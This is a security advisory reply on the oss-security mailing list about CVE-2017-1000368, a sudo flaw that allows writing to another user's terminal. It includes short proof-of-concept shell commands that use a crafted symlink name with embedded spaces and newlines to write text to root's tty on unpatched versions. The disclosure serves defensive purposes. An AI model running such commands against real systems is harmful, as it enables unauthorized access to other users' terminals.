Date: Tue, 6 Jun 2017 15:31:00 -0700 From: Qualys Security Advisory <qsa@...lys.com> To: oss-security@...ts.openwall.com Subject: Re: Arbitrary terminal access via sudo on Linux On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote: > However, the arbitrary tty access IS exploitable in 1.8.20p1. For example, against Sudo < 1.8.20p1: $ /usr/bin/sudo -l ... User john may run the following commands on localhost: (nobody) /usr/bin/sum $ ln -s /usr/bin/sudo ' 1026 ' (1026 is tty2, currently used by root) $ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' (this is written to root's tty2) Or, against Sudo = 1.8.20p1: $ ln -s /usr/bin/sudo $') 1026 \n' $ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' CVE-2017-1000368 was assigned to this newline vulnerability: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368 With best regards, -- the Qualys Security Advisory team
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.